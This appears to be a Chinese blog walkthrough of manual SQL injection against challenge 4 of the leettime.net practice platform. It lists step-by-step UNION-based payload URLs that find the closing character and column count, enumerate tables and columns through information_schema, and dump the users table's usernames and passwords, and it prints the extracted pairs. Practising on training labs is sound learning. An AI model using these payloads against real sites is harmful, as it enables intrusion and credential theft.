server sql 根据列明获取表名_简单SQL注入的手工测试

982bd8acf3c54f26f3866063f7b09f8d.png

0385b6644d0b7b9057e2dde09d055b79.png

SQL注入在线练习平台(http://leettime.net)

b7ab66a3ac0ed7a4017d8d9f57d31be1.png

练习基础模块4

dbc1ad41daf6116d7c182714778919c6.png

1、判断闭合字符和列数

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1

bdf7ebefa974b9f8edf66243d730078f.png

正常显示内容

双引号闭合 " 显示正常页面这个就不是闭合字符

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22

26c3de27f1d4e199755a91ca430ef444.png

双引号和单引号闭合 "' 显示报错页面这个就不是闭合字符

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22%27

67c8cd41d509e2bc6cf736e424f335e5.png

由图片来开还有括号的存在 )

尝试闭合字符 -- - 成功

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20or%201=1%20--%20-

906bf8df37e01d8e59e54ef3d0629842.png

接下来获取表的列数

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%202%20--%20-

3b0c89fb68a2050901bdc5f81e0d66cf.png

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%204%20--%20-

b65b8a8b87ca17257e95dcd5a8b22486.png

order by 5 -- -这个报错说明 数据表的列数为4

fa5926753ce5f032e179ab9a5e6a2b5c.png

2、获取数据的数据回显点和数据获取

7ba8704b21bd58e0613dbf30995b3bac.png

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,2,3,4%20--%20-

87b6971547103f57c4671c7637d0b814.png

数据在第二行的地方可以查询回显数据

数据库查询 leettime_761wHole

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,database(),3,4%20--%20-

92f573f13ca461e351bf8d9990d27f16.png

查询数据安装的路径/usr/@@basedir

ced46ed9c6bbbdc0138770d63ce76d2f.png

e7cbeaab3a44e5d3d96948bb109d648c.png

找出表名 testtable1,userlogs,users

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27leettime_761wHole%27),3,4%20--%20-

e7cbeaab3a44e5d3d96948bb109d648c.png

找出列明id,username,password,user_type,sec_code

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27leettime_761wHole%27%20and%20table_name=%27users%27),3,4%20--%20-

c1fe3a1b70b261373a89b78713d57cf2.png

Username is : #injector#khan#,#decompiler#hacktract#,#devilhunte#dante#,#Zen#sec-idiots#,#Zenodermus#security-i#,#grayhat#hacker#,#khan#haxor#,#admin#sadmin#

http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(0x23,username,0x23,password,0x23)%20from%20leettime_761wHole.users),3,4%20--%20-

8f40cebf8e1ea1fdaeaefd39244e3220.png

总结:注意熟悉information_schama这个表的结构,还有注意group_concat使用

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值